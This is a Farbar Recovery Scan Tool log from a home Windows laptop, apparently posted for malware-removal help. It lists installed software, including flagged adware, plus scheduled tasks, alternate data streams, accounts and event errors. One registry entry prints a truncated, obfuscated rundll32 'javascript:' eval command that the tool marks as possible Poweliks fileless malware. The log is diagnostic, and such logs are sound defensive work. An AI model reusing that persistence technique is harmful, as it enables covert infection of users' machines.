Additional scan result of Farbar Recovery Scan Tool (x64) Version: 27-10-2014 01 Ran by PAKLINE at 2014-10-28 18:51:35 Running from D:\Users\PAKLINE\Desktop Boot Mode: Normal ========================================================== ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1} AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Installed Programs ====================== (Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden Access Help (HKLM-x32\...\{C6FA39A7-26B1-480A-BC74-6D17531AC222}) (Version: 3.00 - Lenovo) Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 15.0.0.293 - Adobe Systems Incorporated) Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated) Adobe Flash Player 15 Plugin (HKLM-x32\...\Adobe Flash Player Plugin) (Version: 15.0.0.152 - Adobe Systems Incorporated) Adobe Photoshop Elements 11 (HKLM-x32\...\Adobe Photoshop Elements 11) (Version: 11.0 - Adobe Systems Incorporated) Adobe Premiere Elements 11 (HKLM\...\PremElem110) (Version: 11.0 - Adobe Systems Incorporated) Adobe Premiere Elements 11 (Version: 11.0 - Adobe Systems Incorporated) Hidden Adobe Reader XI (11.0.09) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.09 - Adobe Systems Incorporated) AT&T Service Activation (HKLM-x32\...\{D81486A1-2371-4059-AC70-1AB894AC96E6}) (Version: 1.8.7.0 - AT&T) AudienceMakr (HKLM-x32\...\AudienceMakr) (Version: 1.0.2 - Infomastery, LLC) AudienceMakr (x32 Version: 1.0.2 - Infomastery, LLC) Hidden Conexant 20561 SmartAudio HD (HKLM\...\CNXT_AUDIO_HDA) (Version: 4.92.10.0 - Conexant) Crystl (HKLM-x32\...\com.ideaincubatorlp.crystl) (Version: 1.0.0 - Infomastery, LLC) Crystl (x32 Version: 1.0.0 - Infomastery, LLC) Hidden DeviceDiscovery (x32 Version: 90.0.146.000 - Hewlett-Packard) Hidden DeviceManagementQFolder (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden Elements 11 Organizer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden FreshKey (HKLM-x32\...\FreshKey) (Version: 1.0.0 - Infomastery, LLC) FreshKey (x32 Version: 1.0.0 - Infomastery, LLC) Hidden HP LaserJet M2727 MFP Series 5.2 (HKLM\...\{3A915D43-FD4F-4e4f-BEF7-B75C160B0236}) (Version: 5.2 - HP) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) hppFaxDrvM2727 (x32 Version: 003.100.00001 - Hewlett-Packard) Hidden hppFaxUtility (x32 Version: 001.001.00017 - Hewlett-Packard) Hidden hppFonts (x32 Version: 001.001.00056 - Hewlett-Packard) Hidden hppLaserJetService (x32 Version: 001.200.00001 - Hewlett-Packard) Hidden hppLJM2727 (x32 Version: 000.102.00102 - Hewlett-Packard) Hidden hppManualsM2727 (x32 Version: 000.002.00001 - Hewlett-Packard) Hidden hppScanTo (x32 Version: 003.103.00004 - Hewlett-Packard) Hidden hppSendFaxM2727 (x32 Version: 003.000.00001 - Hewlett-Packard) Hidden hppTLBXFXM2727 (x32 Version: 001.005.00009 - Hewlett-Packard) Hidden hpzTLBXFX (x32 Version: 005.009.00181 - Hewlett-Packard) Hidden Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation) Intel(R) Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2555 - Intel Corporation) Intel(R) Management Engine Interface (HKLM\...\HECI) (Version: - Intel Corporation) Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 16.1 - Intel) Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 11.2.0.1006 - Intel Corporation) Lenovo Auto Scroll Utility (HKLM\...\LenovoAutoScrollUtility) (Version: 1.11 - ) Lenovo Fingerprint Software (HKLM\...\{2ED326C9-A4E6-4884-B3F0-9A6CFB0A1141}) (Version: 3.3.2.27 - AuthenTec, Inc.) Lenovo Patch Utility (x32 Version: 1.3.2.4 - Lenovo Group Limited) Hidden Lenovo Patch Utility 64 bit (Version: 1.4.0.4 - Lenovo Group Limited) Hidden Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.04.05 - ) Lenovo SimpleTap (HKLM\...\{BF601122-9F0A-41A9-BA06-3158D9FB4B80}) (Version: 3.2.0005.00 - Lenovo Group Limited) Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - ) Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.06.0007 - Lenovo) Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation) Market Samurai (HKLM-x32\...\MarketSamurai.6E37012E1CBD7F47B14488FCC715944F3EBDCEDC.1) (Version: 0.93.35 - Alliance Software Pty Ltd) Market Samurai (x32 Version: 0.93.35 - Alliance Software Pty Ltd) Hidden Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation) Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.0.162.0 - Microsoft Corporation) Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft) Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation) Microsoft Office Ultimate 2007 (HKLM-x32\...\ULTIMATER) (Version: 12.0.6612.1000 - Microsoft Corporation) Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Mobile Broadband Connect (HKLM-x32\...\{91B7B957-0F45-4BDC-85BA-08F80D49B9BC}) (Version: 3.5.0011 - Lenovo) Mobile Broadband drivers (HKLM\...\{83970716-909C-4FBC-9CF5-AD842758BBA0}) (Version: 6.1.10.5 - Ericsson AB) Mozilla Firefox 33.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 33.0 (x86 en-US)) (Version: 33.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 33.0 - Mozilla) MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation) MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation) On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.00 - ) Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.40 - ) PRE11 STI 64Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden Product_Min_QFolder (x32 Version: 1.00.0000 - Hewlett-Packard) Hidden PSE11 STI Installer (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden Revo Uninstaller 1.95 (HKLM-x32\...\Revo Uninstaller) (Version: 1.95 - VS Revo Group) RICOH R5U8xx Media Driver ver.3.64.02 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.64.02 - RICOH) SelectionLinks (HKLM-x32\...\sl-dlc) (Version: 1.0 - SelectionLinks) <==== ATTENTION Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.5.3 - Sophos Limited) System Migration Assistant (HKLM-x32\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0009 - Lenovo Group Limited.) The Path of Hercules (HKLM-x32\...\The Path of Hercules_is1) (Version: 1.0 - Playrix Entertainment) ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.1.3100 - Broadcom Corporation) ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.41 - ) ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.80.5.0 - Conexant Systems) ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.7 - ) ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo) ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.21 - Lenovo) ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.77.0.9 - Lenovo) ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.10.0.0 - Lenovo) ThinkVantage GPS (HKLM-x32\...\{6DB21B2C-2BEF-44B4-B264-8EC2BC2369C6}) (Version: 2.80 - Lenovo) Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-002E-0000-0000-0000000FF1CE}_ULTIMATER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version: - Microsoft) Verizon Wireless Mobile Broadband Self Activation (HKLM-x32\...\{C64A877E-DF8D-4017-AA82-000A77C6D809}) (Version: 3.1.4 - Smith Micro Software, Inc.) WebReg (x32 Version: 90.0.146.000 - Hewlett-Packard) Hidden Windows Driver Package - AuthenTec Inc. (ATSwpWDF) Biometric (01/14/2010 8.6.0.13) (HKLM\...\0481B164C8D1D26C560D6A5E717C5920D4362D60) (Version: 01/14/2010 8.6.0.13 - AuthenTec Inc.) Windows Driver Package - Broadcom (BTHUSB) Bluetooth (04/08/2010 6.3.5.430) (HKLM\...\DE7217D2A8B057F15EC6E52329FDAB84231521E8) (Version: 04/08/2010 6.3.5.430 - Broadcom) Windows Driver Package - Broadcom HIDClass (07/28/2009 6.2.0.9800) (HKLM\...\3BA80AB4C7E9F8497C115C844953A3D4BEB84D21) (Version: 07/28/2009 6.2.0.9800 - Broadcom) Windows Home Server Connector (HKLM\...\{21E49794-7C13-4E84-8659-55BD378267D5}) (Version: 6.0.3436.0 - Microsoft Corporation) ==================== Custom CLSID (selected items): ========================== (If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.) CustomCLSID: HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\PAKLINE\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay No File CustomCLSID: HKU\S-1-5-21-1016725920-775701923-2771934606-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? ==================== Restore Points ========================= ==================== Hosts content: ========================== (If needed Hosts: directive could be included in the fixlist to reset Hosts.) 2009-07-13 19:34 - 2014-10-26 16:54 - 00000046 ____A C:\Windows\system32\Drivers\etc\hosts 192.168.0.2 HOMESERVER #Windows Home Server# ==================== Scheduled Tasks (whitelisted) ============= (If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.) Task: {144DEB51-8583-476D-9294-8B19BD3BDA20} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2014-04-24] () Task: {1796AE6C-B157-439B-85DE-A3889329615E} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated) Task: {18E9694E-4A0A-4D1B-85AC-16187C8E7336} - System32\Tasks\TVT\LenovoWERMonitor => C:\Program Files (x86)\Common Files\lenovo\SUP\sup_wermonitor.exe [2014-03-14] (Microsoft) Task: {28E859EE-2143-4CB1-8030-6BB98B6588F9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program => C:\Program Files\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2012-05-25] (Lenovo) Task: {548E48E9-F16E-4802-86B4-BBAABED66033} - System32\Tasks\Lenovo\SimpleTap\Start SimpleTap for PAKLINE-THINK.PAKLINE => C:\Program Files\Lenovo\SimpleTap\SimpleTap.exe [2012-05-25] (Lenovo) Task: {6B98B5DE-54EF-4BAC-9F28-8DC3DBCFF6BD} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-02-13] (Lenovo) Task: {A1C0B879-0223-44A1-83BB-7EF609A0BD26} - System32\Tasks\AdobeAAMUpdater-1.0-PAKLINE-THINK-PAKLINE => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2011-06-16] (Adobe Systems Incorporated) Task: {AB4B35ED-0A9E-470B-B14B-488C532D0BC5} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe Task: {B7ED55DD-8609-4666-B5E9-8334830132D9} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2014-05-30] (Lenovo) Task: {EED16165-EEAC-4DFE-B6E9-531DC696E49E} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PWMIDTSV.EXE [2013-01-09] (Lenovo Group Limited) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe ==================== Loaded Modules (whitelisted) ============= 2010-02-05 06:45 - 2010-02-05 06:45 - 00117760 _____ () C:\Windows\system32\DTS.exe 2009-10-09 14:36 - 2009-10-09 14:36 - 00438272 ____R () C:\Program Files (x86)\Mobile Broadband Drivers\WMCore\mini_WMCore.exe 2012-12-22 23:21 - 2013-01-09 06:40 - 00094208 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL 2014-03-14 17:47 - 2014-03-14 17:47 - 00092504 _____ () C:\Program Files (x86)\Lenovo\Access Connections\AcWrpc.dll 2009-03-25 21:08 - 2009-03-25 21:08 - 00058880 ____R () C:\Program Files (x86)\Mobile Broadband Drivers\WMCore\MBMDebug.dll 2010-01-27 11:47 - 2010-01-27 11:47 - 00061440 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\HPTools.dll 2010-01-27 11:47 - 2010-01-27 11:47 - 00069632 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\HPToolkit.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00069632 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\AppConstants.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00524288 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\HPAppTools.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00840192 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\PLSDMXMLObjects.dll 2010-01-27 11:47 - 2010-01-27 11:47 - 00130560 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\DMBaseObjects.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00086016 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\HPFaxUtilities.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00835584 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\Alerts.dll 2009-10-15 07:25 - 2009-10-15 07:25 - 00364544 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\nativeutils.dll 2010-01-27 11:48 - 2010-01-27 11:48 - 00438272 _____ () C:\Program Files (x86)\HP\ToolboxFX\bin\FrameworkUI.dll 2014-10-15 03:55 - 2014-10-15 03:55 - 00172544 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\IsdiInterop\2dace9622c68c6ce58d55a6950eeaa95\IsdiInterop.ni.dll 2012-12-23 11:21 - 2012-05-30 13:55 - 00059904 _____ () C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IsdiInterop.dll ==================== Alternate Data Streams (whitelisted) ========= (If an entry is included in the fixlist, only the Alternate Data Streams will be removed.) AlternateDataStreams: C:\ProgramData\TEMP:057D335E AlternateDataStreams: C:\ProgramData\TEMP:0D560A24 AlternateDataStreams: C:\ProgramData\TEMP:0F4A7B6A AlternateDataStreams: C:\ProgramData\TEMP:157A85BF AlternateDataStreams: C:\ProgramData\TEMP:1DD12619 AlternateDataStreams: C:\ProgramData\TEMP:2208DD60 AlternateDataStreams: C:\ProgramData\TEMP:25612F5D AlternateDataStreams: C:\ProgramData\TEMP:25FF8A61 AlternateDataStreams: C:\ProgramData\TEMP:2BD96194 AlternateDataStreams: C:\ProgramData\TEMP:30C74695 AlternateDataStreams: C:\ProgramData\TEMP:32ED5FDF AlternateDataStreams: C:\ProgramData\TEMP:4AC411FC AlternateDataStreams: C:\ProgramData\TEMP:4B1DA55E AlternateDataStreams: C:\ProgramData\TEMP:55E1F0F4 AlternateDataStreams: C:\ProgramData\TEMP:57A1F470 AlternateDataStreams: C:\ProgramData\TEMP:64649538 AlternateDataStreams: C:\ProgramData\TEMP:6D7D86E8 AlternateDataStreams: C:\ProgramData\TEMP:710BBE5E AlternateDataStreams: C:\ProgramData\TEMP:78C04239 AlternateDataStreams: C:\ProgramData\TEMP:80CC1319 AlternateDataStreams: C:\ProgramData\TEMP:8497EEBD AlternateDataStreams: C:\ProgramData\TEMP:89952728 AlternateDataStreams: C:\ProgramData\TEMP:8EBDAD11 AlternateDataStreams: C:\ProgramData\TEMP:96B8AB27 AlternateDataStreams: C:\ProgramData\TEMP:98A8ABBD AlternateDataStreams: C:\ProgramData\TEMP:A1D41B64 AlternateDataStreams: C:\ProgramData\TEMP:A228E61B AlternateDataStreams: C:\ProgramData\TEMP:B351F9B6 AlternateDataStreams: C:\ProgramData\TEMP:B5F4E210 AlternateDataStreams: C:\ProgramData\TEMP:B7B09D45 AlternateDataStreams: C:\ProgramData\TEMP:C5AB6B6C AlternateDataStreams: C:\ProgramData\TEMP:C639099E AlternateDataStreams: C:\ProgramData\TEMP:D7AC6688 AlternateDataStreams: C:\ProgramData\TEMP:E64837BC AlternateDataStreams: C:\ProgramData\TEMP:F3B5A9E2 AlternateDataStreams: C:\ProgramData\TEMP:F54781BF AlternateDataStreams: C:\ProgramData\TEMP:F614E9D7 AlternateDataStreams: C:\ProgramData\TEMP:F6F0620D AlternateDataStreams: C:\ProgramData\TEMP:FFDA30C6 ==================== Safe Mode (whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.) ==================== EXE Association (whitelisted) ============= (If an entry is included in the fixlist, the default will be restored. None default entries will be removed.) ==================== MSCONFIG/TASK MANAGER disabled items ========= (Currently there is no automatic fix for this section.) MSCONFIG\Services: IAANTMON => 2 ========================= Accounts: ========================== Administrator (S-1-5-21-1016725920-775701923-2771934606-500 - Administrator - Disabled) Guest (S-1-5-21-1016725920-775701923-2771934606-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-1016725920-775701923-2771934606-1006 - Limited - Enabled) JLKLINE (S-1-5-21-1016725920-775701923-2771934606-1003 - Administrator - Enabled) => C:\Users\JLKLINE PAKLINE (S-1-5-21-1016725920-775701923-2771934606-1000 - Administrator - Enabled) => C:\Users\PAKLINE ==================== Faulty Device Manager Devices ============= Name: Intel(R) Turbo Memory Controller Description: Intel(R) Turbo Memory Controller Class Guid: {4d36e97b-e325-11ce-bfc1-08002be10318} Manufacturer: Intel Service: iaNvStor Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19) Resolution: A registry problem was detected. This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options: On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver. ==================== Event log errors: ========================= Application errors: ================== Error: (10/28/2014 06:04:21 PM) (Source: WinMgmt) (EventID: 10) (User: ) Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003 Error: (10/28/2014 05:29:44 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program OUTLOOK.EXE version 12.0.6691.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: e474 Start Time: 01cff30eb6975704 Termination Time: 16 Application Path: C:\Program Files (x86)\Microsoft Office\Office12\OUTLOOK.EXE Report Id: 9ff16c26-5f02-11e4-8b4a-001c2597faeb Error: (10/28/2014 05:22:52 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:51 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:50 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:50 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:49 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:49 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:49 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. Error: (10/28/2014 05:22:49 PM) (Source: ESENT) (EventID: 482) (User: ) Description: taskhost (2956) WebCacheLocal: An attempt to write to the file "C:\Users\PAKLINE\AppData\Local\Microsoft\Windows\WebCache\V01res00014.jrs" at offset 0 (0x0000000000000000) for 393216 (0x00060000) bytes failed after taskhost0 seconds with system error 112 (0x00000070): "There is not enough space on the disk. ". The write operation will fail with error -1808 (0xfffff8f0). If this error persists then the file may be damaged and may need to be restored from a previous backup. System errors: ============= Error: (10/28/2014 06:05:26 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/28/2014 06:05:07 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver Send to Microsoft OneNote 15 Driver required for printer Send To OneNote 2013 is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 06:05:06 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver Amyuni Document Converter 400 required for printer Quicken PDF Printer is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 06:05:04 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver hpfax1 required for printer HP LaserJet M2727 MFP Series Fax is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 06:05:00 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver CutePDF Writer required for printer CutePDF Writer is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 06:05:00 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver Amyuni Document Converter 400 required for printer ABS PDF Driver v400 is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 06:04:45 PM) (Source: UmrdpService) (EventID: 1111) (User: ) Description: Driver Amyuni Document Converter 300 required for printer Amyuni Document Converter 300 is unknown. Contact the administrator to install the driver before you log in again. Error: (10/28/2014 05:17:25 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} Error: (10/28/2014 01:40:27 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.187.665.0 Update Source: %NT AUTHORITY59 Update Stage: 4.6.0305.00 Source Path: 4.6.0305.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Error: (10/28/2014 01:21:19 PM) (Source: Microsoft Antimalware) (EventID: 2001) (User: ) Description: %NT AUTHORITY60 has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.187.665.0 Update Source: %NT AUTHORITY59 Update Stage: 4.6.0305.00 Source Path: 4.6.0305.01 Signature Type: %NT AUTHORITY602 Update Type: %NT AUTHORITY604 User: NT AUTHORITY\SYSTEM Current Engine Version: %NT AUTHORITY605 Previous Engine Version: %NT AUTHORITY606 Error code: %NT AUTHORITY607 Error description: %NT AUTHORITY608 Microsoft Office Sessions: ========================= CodeIntegrity Errors: =================================== Date: 2014-10-28 18:05:18.426 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-10-24 06:58:34.963 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-10-24 06:41:14.762 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-10-24 06:36:36.753 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system. Date: 2014-10-24 06:06:06.576 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image 